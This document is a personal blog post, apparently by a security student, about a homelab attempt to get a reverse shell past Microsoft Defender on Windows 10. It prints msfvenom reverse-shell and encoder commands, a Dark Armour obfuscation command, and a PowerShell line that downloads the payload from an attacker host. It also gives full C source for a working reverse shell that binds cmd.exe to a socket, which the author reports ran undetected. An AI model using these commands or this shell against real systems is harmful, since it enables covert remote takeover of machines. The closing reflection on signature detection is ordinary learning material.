<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title> Am I Smarter Than Microsoft Defender | Caleb Lerch </title> <meta name="author" content="Caleb Lerch"> <meta name="description" content="An antivirus engine evasion from my homelab."> <meta name="keywords" content="jekyll, jekyll-theme, academic-website, portfolio-website"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self' 'unsafe-inline' https:; style-src 'self' 'unsafe-inline' https:; img-src 'self' data: https:; font-src 'self' data: https:; media-src 'self' https:; frame-src 'self' https:; connect-src 'self' https:;"> <style>
  :root {
    --max-content-width: 930px;
  }
</style> <link rel="stylesheet" href="/assets/css/tailwind.css?v=50c64c15cbb9fd1ce6056fdb8bcb4b62"> <link defer rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@7.2.0/css/all.min.css" integrity="sha256-MVopmdyC2tYTiJ8wlktf0uh0v4NgT+vNdyVFepi7Q0c=" crossorigin="anonymous"> <link defer rel="stylesheet" href="https://cdn.jsdelivr.net/npm/academicons@1.9.5/css/academicons.min.css" integrity="sha256-SzrCOBJbGVFMahewkgjwnApaV2+av1DwMAA+/QGLyZw=" crossorigin="anonymous"> <link defer rel="stylesheet" href="https://cdn.jsdelivr.net/npm/scholar-icons@1.0.3/css/scholar-icons.css" integrity="sha256-VY3hHVj/hNX3fYG6wtbA6TcKJQl7+FthzGSyIB64klY=" crossorigin="anonymous"> <link defer rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Roboto+Slab:100,300,400,500,700|Material+Icons&amp;display=swap"> <link defer rel="stylesheet" href="/assets/css/jekyll-pygments-themes-github.css?v=591dab5a4e56573bf4ef7fd332894c99" media="" id="highlight_theme_light"> <link rel="shortcut icon" href="/assets/img/favicon.png?v=1cf6ab08445ca4f0922d9351f58c7103"> <link rel="stylesheet" href="/assets/css/main.css?v=f0b101217084a90093badfe99ff9a7d1"> <link rel="canonical" href="https://stomper4.github.io/blog/2024/mc-defender/"> <script src="/assets/js/theme.js?v=7af685e2ba20b37fef545c97b8064050"></script> <link defer rel="stylesheet" href="/assets/css/jekyll-pygments-themes-native.css?v=5847e5ed4a4568527aa6cfab446049ca" media="none" id="highlight_theme_dark"> <script>
    initTheme();
  </script> <link rel="stylesheet" href="/assets/css/al-folio-distill.css?v=fb7196ec07cb5299d51b2cbdc69c23d7"> <script src="/assets/js/distillpub/template.v2.js"></script> <script src="/assets/js/distillpub/transforms.v2.js"></script> <style type="text/css">
        .table td { border-left: 1px solid var(--global-divider-color); border-right: 1px solid var(--global-divider-color); } .table th { border-left: 1px solid var(--global-divider-color); border-right: 1px solid var(--global-divider-color); } d-appendix { display: none !important; } pre, code { white-space: pre-wrap !important; word-wrap: break-word !important; word-break: break-word !important; }

      </style> </head> <body> <d-front-matter> <script async type="text/json">
      {
            "title": "Am I Smarter Than Microsoft Defender",
            "description": "An antivirus engine evasion from my homelab.",
            "published": "October 15, 2024",
            "authors": [
              
            ],
            "katex": {
              "delimiters": [
                {
                  "left": "$",
                  "right": "$",
                  "display": false
                },
                {
                  "left": "$$",
                  "right": "$$",
                  "display": true
                }
              ]
            }
          }
    </script> </d-front-matter> <header> <nav id="navbar" class="navbar navbar-light navbar-expand-sm fixed-top" role="navigation"> <div class="container"> <a class="navbar-brand title font-weight-lighter" href="//"> <span class="font-weight-bold">Caleb</span> Lerch </a> <button class="navbar-toggler collapsed navbar-toggler-main" type="button" data-nav-toggle="navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar top-bar"></span> <span class="icon-bar middle-bar"></span> <span class="icon-bar bottom-bar"></span> </button> <div class="collapse navbar-collapse navbar-collapse-main" id="navbarNav"> <ul class="navbar-nav navbar-menu-list flex-nowrap"> <li class="nav-item "> <a class="nav-link" href="/">About </a> </li> <li class="nav-item active"> <a class="nav-link" href="/blog/">Blog </a> </li> <li class="nav-item "> <a class="nav-link" href="/projects/">Projects </a> </li> <li class="nav-item "> <a class="nav-link" href="/publications/">Publications </a> </li> <li class="toggle-container"> <button id="light-toggle" type="button" title="Change theme" aria-label="Change color theme"> <i class="fa-half-sun-moon" id="light-toggle-system"></i> <i class="fa-solid fa-moon" id="light-toggle-dark"></i> <i class="fa-solid fa-sun" id="light-toggle-light"></i> </button> </li> </ul> </div> </div> </nav> <progress id="progress" value="0"> <div class="progress-container"> <span class="progress-bar"></span> </div> </progress> </header> <div class="post distill"> <d-title> <h1>Am I Smarter Than Microsoft Defender</h1> <p>An antivirus engine evasion from my homelab.</p> </d-title> <d-article> <d-contents> <nav class="l-text figcaption"> <h3>Contents</h3> <div> <a href="#setting-the-stage">Setting the Stage</a> </div> <div> <a href="#obfuscating-the-shells">Obfuscating the Shells</a> </div> <div> <a href="#starting-from-scratch">Starting from Scratch</a> </div> <div> <a href="#lesson">Lesson</a> </div> </nav> </d-contents> <p><strong>Note:</strong> This is a retroactive publishing in May 2026 of a homelab project I completed in November 2024.</p> <h2 id="setting-the-stage">Setting the Stage</h2> <p>It’s fall 2024, I am in my third semester of the Information Systems Security diploma at SAIT and taking a class on Operating System Exploitation. The class is a little outdated, but it’s here that I will be first introduced to the basics of shells, buffer overflow, return oriented programming, userland hooking, and simple rootkits. A common task in this class was to download a vulnerable application on a Windows 10 VM, and either find a proof of concept exploit online or debug the application to build one. For most exploits we turned off modern protections such as ASLR, safeSEH, and SEHOP. Microsoft Defender was also disabled for all attacks.</p> <p>Outside classes I had been meeting (and looking up to) as many offensive security professionals as I could. They did not speak of Windows Defender with the same respect as my fellow students and instructor. For these professionals, Windows Defender EDR for enterprise was regularly bypassed in engagements. Your home antivirus version of Defender that we had wasn’t regarded as a challenge. I took it upon myself to try to create a real time TCP reverse shell that would work on Windows 10 with Defender fully functional and up to date. This program would allow me to take real-time control of the entire machine from an external device.</p> <h2 id="obfuscating-the-shells">Obfuscating the Shells</h2> <p>The first thing I tried was trusty old metasploit, my instructors favourite tool. Maybe better described as rusty old metasploit, all shells I tried were quarantined as soon as I transferred them to disk, not even allowing me the opportunity to try and run the payloads.</p> <p>An example MSFVenom command:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfvenom <span class="nt">-a</span> x64 <span class="nt">--platform</span> windows <span class="nt">-p</span> windows/x64/shell_reverse_tcp <span class="nt">-f</span> exe <span class="nt">-o</span> venom_reverse_shell.exe <span class="nv">LHOST</span><span class="o">=</span>176.16.4.7 <span class="nv">LPORT</span><span class="o">=</span>3117
</code></pre></div></div> <p>I transferred it to Windows using PowerShell:</p> <pre><code class="language-PowerShell">(New-Object Net.WebClient).DownloadFile('http://176.16.4.7:3000/venom_reverse_shell.exe','C:\Users\User\payload1.exe')
</code></pre> <p>And not for the last time, metasploit failed me. My file disappeared into the void before I even had a chance to try it.</p> <p><img class="img-fluid z-dept-1 rounded shadow" src="/assets/img/Def1.png"></p> <p>Next up I applied the coolest sounding obfuscation I could find. Modern payloads are encoded, meaning the bytes are swapped or re-arranged like a cipher. When the payload is run it simultaneously decodes itself and executes. That might stop Windows Defender from recognizing the payload so easily. Shikata ga nai (SGN) is Japanese for “nothing can be done about it”, sounds perfect. Metasploit comes with a 32bit version and a separate 64bit encoding based on it. (I used the latter.) See <a href="https://docs.rapid7.com/metasploit/the-payload-generator/#encoder" target="_blank" rel="noopener noreferrer">Metasploit Encoder Docs</a> to learn more about encoding MSFVenom payloads.</p> <p>An example MSFVenom command:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfvenom <span class="nt">-a</span> x64 <span class="nt">--platform</span> windows <span class="nt">-p</span> windows/x64/shell_reverse_tcp <span class="nt">-f</span> exe <span class="nt">-o</span> venom_sgn.exe  <span class="nt">-e</span> x64/zutto_dekiru <span class="nt">-i</span> 3 <span class="nv">LHOST</span><span class="o">=</span>176.16.4.7 <span class="nv">LPORT</span><span class="o">=</span>3117
</code></pre></div></div> <p>Another full stop by the antivirus. I even tried to be cute and rename the file:</p> <p><img class="img-fluid z-dept-1 rounded shadow" src="/assets/img/Def-2.png"></p> <p>To my surprise, Defender also grabbed this payload before I could run it. If you want to learn more about how SGN works (maybe to use it better than I did) see the <a href="https://github.com/egebalci/sgn" target="_blank" rel="noopener noreferrer">new SGN release</a> and <a href="https://cloud.google.com/blog/topics/threat-intelligence/shikata-ga-nai-encoder-still-going-strong/" target="_blank" rel="noopener noreferrer">SGN still going strong (2019)</a>.</p> <p><img class="img-fluid z-dept-1 rounded shadow" src="/assets/img/Def1.png"></p> <p>Time for the big guns. <a href="https://github.com/bats3c/darkarmour" target="_blank" rel="noopener noreferrer">Dark Armour</a> is a self proclaimed Windows AV Evasion Tool. I used it to scramble my encoded metasploit shell even further.</p> <p>An example Dark Armour command:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./darkarmour.py <span class="nt">-f</span> ~/Desktop/payloads/venom_sgn.exe <span class="nt">--encrypt</span> xor <span class="nt">--jmp</span> <span class="nt">-o</span> bins/legit.exe <span class="nt">--loop</span> 5 <span class="nt">-o</span> ~/Desktop/payloads/darkarmor.exe 
</code></pre></div></div> <p><img class="img-fluid z-dept-1 rounded shadow" src="/assets/img/Def-3.png"></p> <p>For the first time, Defender did not know that it was metasploit that I built the payload with.. but it still caught me during file transfer.</p> <p><img class="img-fluid z-dept-1 rounded shadow" src="/assets/img/Def-4.png"></p> <p>At this point I was pretty surprised. Defender, to its credit was doing great. From my classes I had thought that AV evasion was a linear process: write a shell, apply an encoding to disguise your payload, and send it! I was so surprised that I coded a completely safe file in c, sent it to my VM over HTTP, and ran it, just to see if defender was blocking every file I transferred. Here is a couple lines directly quoted from the notes I was taking in real time:</p> <ul> <li>This is not a shell of any kind, but it is a low trust executable and I want to test whether defender will allow the http file transfer.</li> <li>As a matter of fact, this worked perfectly</li> <li>No issues here!</li> <li>Except that this is not a reverse shell and I have accomplished nothing</li> </ul> <h2 id="starting-from-scratch">Starting from Scratch</h2> <p>I had all but given up on open source tools written for this task but I wasn’t done yet. My backup plan was <a href="https://blog.sevagas.com/?Bypass-Antivirus-Dynamic-Analysis&amp;recherche=bypass%20antivirus%20dynamic%20analysis" target="_blank" rel="noopener noreferrer">Bypass Antivirus Dynamic Analysis (2014)</a>, an article about coding strategies to bypass AV that a friend had shared with me. The first thing I needed was a simple, not obfuscated reverse shell. I would try each obfuscation technique from the article, and surely one of them would work against Defender. Maybe I fancied myself the lone security student taking on Microsoft.</p> <p>The plain shell I started with was:</p> <div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;winsock2.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;windows.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;io.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;process.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/types.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
</span>
<span class="cm">/* ================================================== */</span>
<span class="cm">/* |     CHANGE THIS TO THE CLIENT IP AND PORT      | */</span>
<span class="cm">/* ================================================== */</span>
<span class="cp">#if !defined(CLIENT_IP) || !defined(CLIENT_PORT)
# define CLIENT_IP (char*)"0.0.0.0"
# define CLIENT_PORT (int)0
#endif
</span><span class="cm">/* ================================================== */</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">CLIENT_IP</span><span class="p">,</span> <span class="s">"0.0.0.0"</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="o">||</span> <span class="n">CLIENT_PORT</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">write</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="s">"[ERROR] CLIENT_IP and/or CLIENT_PORT not defined.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="mi">50</span><span class="p">);</span>
		<span class="k">return</span> <span class="p">(</span><span class="mi">1</span><span class="p">);</span>
	<span class="p">}</span>

	<span class="n">WSADATA</span> <span class="n">wsaData</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">WSAStartup</span><span class="p">(</span><span class="n">MAKEWORD</span><span class="p">(</span><span class="mi">2</span> <span class="p">,</span><span class="mi">2</span><span class="p">),</span> <span class="o">&amp;</span><span class="n">wsaData</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">write</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="s">"[ERROR] WSASturtup failed.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="mi">27</span><span class="p">);</span>
		<span class="k">return</span> <span class="p">(</span><span class="mi">1</span><span class="p">);</span>
	<span class="p">}</span>

	<span class="kt">int</span> <span class="n">port</span> <span class="o">=</span> <span class="n">CLIENT_PORT</span><span class="p">;</span>
	<span class="k">struct</span> <span class="nc">sockaddr_in</span> <span class="n">sa</span><span class="p">;</span>
	<span class="n">SOCKET</span> <span class="n">sockt</span> <span class="o">=</span> <span class="n">WSASocketA</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="n">IPPROTO_TCP</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
	<span class="n">sa</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span>
	<span class="n">sa</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="n">port</span><span class="p">);</span>
	<span class="n">sa</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">inet_addr</span><span class="p">(</span><span class="n">CLIENT_IP</span><span class="p">);</span>

<span class="cp">#ifdef WAIT_FOR_CLIENT
</span>	<span class="k">while</span> <span class="p">(</span><span class="n">connect</span><span class="p">(</span><span class="n">sockt</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="nc">sockaddr</span> <span class="o">*</span><span class="p">)</span> <span class="o">&amp;</span><span class="n">sa</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sa</span><span class="p">))</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">Sleep</span><span class="p">(</span><span class="mi">5000</span><span class="p">);</span>
	<span class="p">}</span>
<span class="cp">#else
</span>	<span class="k">if</span> <span class="p">(</span><span class="n">connect</span><span class="p">(</span><span class="n">sockt</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="nc">sockaddr</span> <span class="o">*</span><span class="p">)</span> <span class="o">&amp;</span><span class="n">sa</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sa</span><span class="p">))</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">write</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="s">"[ERROR] connect failed.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="mi">24</span><span class="p">);</span>
		<span class="k">return</span> <span class="p">(</span><span class="mi">1</span><span class="p">);</span>
	<span class="p">}</span>
<span class="cp">#endif
</span>
	<span class="n">STARTUPINFO</span> <span class="n">sinfo</span><span class="p">;</span>
	<span class="n">memset</span><span class="p">(</span><span class="o">&amp;</span><span class="n">sinfo</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sinfo</span><span class="p">));</span>
	<span class="n">sinfo</span><span class="p">.</span><span class="n">cb</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sinfo</span><span class="p">);</span>
	<span class="n">sinfo</span><span class="p">.</span><span class="n">dwFlags</span> <span class="o">=</span> <span class="p">(</span><span class="n">STARTF_USESTDHANDLES</span><span class="p">);</span>
	<span class="n">sinfo</span><span class="p">.</span><span class="n">hStdInput</span> <span class="o">=</span> <span class="p">(</span><span class="n">HANDLE</span><span class="p">)</span><span class="n">sockt</span><span class="p">;</span>
	<span class="n">sinfo</span><span class="p">.</span><span class="n">hStdOutput</span> <span class="o">=</span> <span class="p">(</span><span class="n">HANDLE</span><span class="p">)</span><span class="n">sockt</span><span class="p">;</span>
	<span class="n">sinfo</span><span class="p">.</span><span class="n">hStdError</span> <span class="o">=</span> <span class="p">(</span><span class="n">HANDLE</span><span class="p">)</span><span class="n">sockt</span><span class="p">;</span>
	<span class="n">PROCESS_INFORMATION</span> <span class="n">pinfo</span><span class="p">;</span>
	<span class="n">CreateProcessA</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="s">"cmd"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">TRUE</span><span class="p">,</span> <span class="n">CREATE_NO_WINDOW</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">sinfo</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pinfo</span><span class="p">);</span>

	<span class="k">return</span> <span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div> <p>I actually got it from github, I no longer have the link but shoutout to whoever wrote it. This is a well written but vanilla remote shell, easy for me to add code to for the sake of obfuscation! Lets try it out vanilla first.</p> <p>Compiling: <img class="img-fluid z-dept-1 rounded shadow" src="/assets/img/Def-5.png"></p> <p>Testing: <img class="img-fluid z-dept-1 rounded shadow" src="/assets/img/Def-6.png"></p> <p>Thats right, it worked. No obfuscation needed. The above image shows my Kali VM sending the whoami command to my compromised Windows host and the response. I now felt like I had the same lack of respect for Microsoft Defender Antivirus as the professionals I had been getting to know.</p> <p>I sent this basic, unobfuscated shell to virustotal and it was labelled malicious by less than half of the antivirus programs tested. Make no mistake this <strong>IS</strong> a malicious program! <img class="img-fluid z-dept-1 rounded shadow" src="/assets/img/Def-7.png"></p> <h2 id="lesson">Lesson</h2> <p>Of course this isn’t a complete security bypass, the antivirus is still functioning. Depending on what commands are run, Defender might still alert on suspicious activity. This is an example of a real time reverse shell running undetected on Windows 10.</p> <p>I took a malware analysis class the next semester and learned a little bit about how these payloads can be caught. My best guess is that I was getting caught by a basic example of signature detection. Signature detection assigns a unique hash to a part of or a complete malicious file and saves it in a database. It then takes a signature (or several) of all files before allowing them to run. If the signature matches a malicious example from the database the antivirus does not allow it to run. In my case even if I had a unique payload, the section of code which decodes the payload before running it would have been known malicious because the tools are public. It is also possible that so many signatures have been taken from these tools that despite my best effort I had not yet generated a unique payload.</p> <p>I completely disregarded metasploit after this experience. Over a year later I was in a bookstore and picked up a book on <a href="https://nostarch.com/metasploit-2nd-edition" target="_blank" rel="noopener noreferrer">Metasploit</a>. It took about 30 seconds of browsing to realize that metasploit ships with significantly more impactful ways to obfuscate payloads than I had tried. I didn’t buy the book but I recognize that a super-user could achieve far more with the program than I did.</p> <p>Coding is a super power. Writing code (even in C or Assembly) is not so hard that it is difficult to create unique payloads as you need them. This has been far more effective for me than relying on open source tools to generate shellcode or other payloads. Whether it is custom binary encoding or researched sandbox evasion techniques, it is easy to learn and far from impossible to code.</p> </d-article> <d-appendix> <d-footnote-list></d-footnote-list> <d-citation-list></d-citation-list> </d-appendix> <d-bibliography src="/assets/bibliography/"></d-bibliography> <d-article> <br> <br> </d-article> </div> <footer class="fixed-bottom" role="contentinfo"> <div class="container mt-0"> © Copyright 2026 Caleb Lerch. Powered by <a href="https://jekyllrb.com/" target="_blank" rel="external nofollow noopener">Jekyll</a> with <a href="https://github.com/alshedivat/al-folio" rel="external nofollow noopener" target="_blank">al-folio</a> theme. Hosted by <a href="https://pages.github.com/" target="_blank" rel="external nofollow noopener">GitHub Pages</a>. </div> </footer> <script>
  window.alFolio = {
    compatBootstrap: false
  };
</script> <script src="/assets/js/nav-toggle.js?v=141bd79a73ebc0f0b6ea58e440ae79fc"></script> <script src="/assets/js/distillpub/overrides.js"></script> <script defer type="text/javascript" id="MathJax-script" src="https://cdn.jsdelivr.net/npm/mathjax@3.2.2/es5/tex-mml-chtml.js" integrity="sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI=" crossorigin="anonymous"></script> <script src="//assets/al_math/js/mathjax-setup.js"></script> <script defer src="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?features=es6" crossorigin="anonymous"></script> <script src="/assets/js/tooltips-setup.js?v=fe487e99db6c43751e6e7bdb2d6a0611"></script> <script src="/assets/js/no_defer.js?v=53b1b1a645525975c963ce8bf8bfefcf"></script> <script defer src="/assets/js/common.js?v=87baac90f765f2f3362dcf6aaf312a8a"></script> <script defer src="/assets/js/copy_code.js?v=c8a01c11a92744d44b093fc3bda915df" type="text/javascript"></script> <script defer src="/assets/js/jupyter_new_tab.js?v=896d254890d9b47f0281f63bfccf0dee"></script> <script defer src="https://cdn.jsdelivr.net/npm/medium-zoom@1.1.0/dist/medium-zoom.min.js" integrity="sha256-ZgMyDAIYDYGxbcpJcfUnYwNevG/xi9OHKaR/8GK+jWc=" crossorigin="anonymous"></script> <script defer src="//assets/al_img_tools/js/zoom.js"></script> <script defer src="/assets/js/progress-bar.js?v=499464c5c63ced6cf7ad62509f1e2610" type="text/javascript"></script> <script src="https://cdn.jsdelivr.net/npm/vanilla-back-to-top@7.2.1/dist/vanilla-back-to-top.min.js" integrity="sha256-uMJJ3EoTyfRBoTbR+lrfu1uRQ87RZG8AR3cVNuQVeFg=" crossorigin="anonymous"></script> <script>
    addBackToTop();
  </script> </body> </html>